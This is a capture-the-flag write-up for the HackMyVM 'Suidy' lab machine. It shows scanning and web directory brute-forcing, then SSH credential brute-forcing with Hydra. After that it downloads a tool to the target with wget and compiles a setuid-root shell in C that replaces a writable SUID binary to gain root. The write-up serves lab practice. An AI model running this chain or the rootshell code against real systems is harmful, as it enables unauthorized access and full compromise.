HackMyVM - Suidy

Posted on Edited on In Views: Disqus: Word count in article: 852 Reading time ≈ 3 mins.
Hidden directory discovery, SSH brute-force, and custom SUID binary exploitation.

suidy

scan

1
2
3
4
5
6
7
8
9
10
❯ rustscan -a  192.168.0.109 -- -A -sV
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
53/tcp open  domain  syn-ack (generic dns response: SERVFAIL)
80/tcp open  http    syn-ack nginx 1.14.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

web

1
2
3
❯ gobuster dir -u http://192.168.0.109/ -w ~/ctf/tool/dic/dir.txt
/index.html           (Status: 200) [Size: 22]
/robots.txt           (Status: 200) [Size: 362]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
view-source:http://192.168.0.109/robots.txt

/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

.... .. .- --. .- .. -.
from morse code
HIAGAIN
hiagain

http://192.168.0.109/shehatesme/

She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like "theuser/thepass" to access to her system!
All that you need is an small dict from Seclist!

❯ gobuster dir -u http://192.168.0.109/shehatesme/ -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt
/full.txt
/about.txt
/search.txt
/privacy.txt
/blog.txt
/new.txt
/page.txt
/forums.txt
/jobs.txt
/other.txt
/welcome.txt
/admin.txt
/faqs.txt
/2001.txt
/link.txt
/space.txt
/network.txt
/google.txt
/folder.txt
/java.txt
/issues.txt
/guide.txt
/es.txt
/art.txt
/smilies.txt
/airport.txt
/secret.txt
/procps.txt
/pynfo.txt
/lh2.txt
/muze.txt
/alba.txt
/cymru.txt
/wha.txt

request and get file

1
2
3
4
5
6
7
8
import requests
import sys

for j in sys.stdin:
        j=j.strip()
        response=requests.get(f"http://192.168.0.109/shehatesme{j}")
        # print(f"http://192.168.0.109/shehatesme{j}")
        print(response.text)

bruteforce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ cat tmp | python tmp.py | sort | uniq -c
     34
      1 hidden1/passZZ!
     25 jaime11/JKiufg6
      1 jhfbvgt/iugbnvh
      1 john765/FDrhguy
      1 maria11/jhfgyRf
      1 mmnnbbv/iughtyr
      1 nhvjguy/kjhgyut
      1 smileys/98GHbjh
      1 theuser/thepass
      1 yuijhse/hjupnkk

❯ hydra -L ./tmp -P ./tmp2 ssh://192.168.0.109
[22][ssh] host: 192.168.0.109   login: theuser   password: thepass

hidden1:passZZ!
jaime11:JKiufg6
jhfbvgt:iugbnvh
john765:FDrhguy
maria11:jhfgyRf
mmnnbbv:iughtyr
nhvjguy:kjhgyut
smileys:98GHbjh
theuser:thepass
yuijhse:hjupnkk

❯ hydra -C ./tmp  ssh://192.168.0.109
[22][ssh] host: 192.168.0.109   login: theuser   password: thepass

ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
theuser/thepass
❯ ssh theuser@192.168.0.109
theuser@suidy:~$ ls -al
total 36
drwxr-xr-x 3 theuser theuser 4096 sep 27  2020 .
drwxr-xr-x 4 root    root    4096 sep 26  2020 ..
-rw------- 1 theuser theuser   29 sep 27  2020 .bash_history
-rw-r--r-- 1 theuser theuser  220 sep 26  2020 .bash_logout
-rw-r--r-- 1 theuser theuser 3526 sep 26  2020 .bashrc
drwxr-xr-x 3 theuser theuser 4096 sep 26  2020 .local
-rw-r--r-- 1 theuser theuser  807 sep 26  2020 .profile
-rw-r--r-- 1 theuser theuser   11 sep 26  2020 user.txt
-rw------- 1 theuser theuser   51 sep 26  2020 .Xauthority
theuser@suidy:~$ cat user.txt
HMV2353IVI

theuser@suidy:~$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsrwsr-x 1 root theuser     16704 sep 26  2020 /home/suidy/suidyyyyy
-rwsr-xr-x 1 root root        54096 jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root        44528 jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root        84016 jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        51280 ene 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root        44440 jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root        63736 jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root        63568 ene 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root        34888 ene 10  2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus  51184 jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10232 mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       436552 ene 31  2020 /usr/lib/openssh/ssh-keysign

theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!

-suidy

upload

1
❯ python -m http.server
1
2
3
4
5
6
7
suidy@suidy:/home/suidy$ wget http://192.168.0.105:8000/pspy64

2025/08/08 14:49:41 CMD: UID=0     PID=1      | /sbin/init
2025/08/08 14:50:01 CMD: UID=0     PID=1446   | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0     PID=1447   | /usr/sbin/CRON -f
2025/08/08 14:50:01 CMD: UID=0     PID=1448   | /bin/sh -c sh /root/timer.sh
2025/08/08 14:50:01 CMD: UID=0     PID=1449   | sh /root/timer.sh

upload and gcc and replace suidyyyyy

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
1
2
3
4
5
6
7
8
theuser@suidy:~$ gcc rootshell.c -o suidyyyyy
theuser@suidy:~$ cp suidyyyyy /home/suidy/suidyyyyy

theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# id

root@suidy:/root# cat root.txt
HMV0000EVE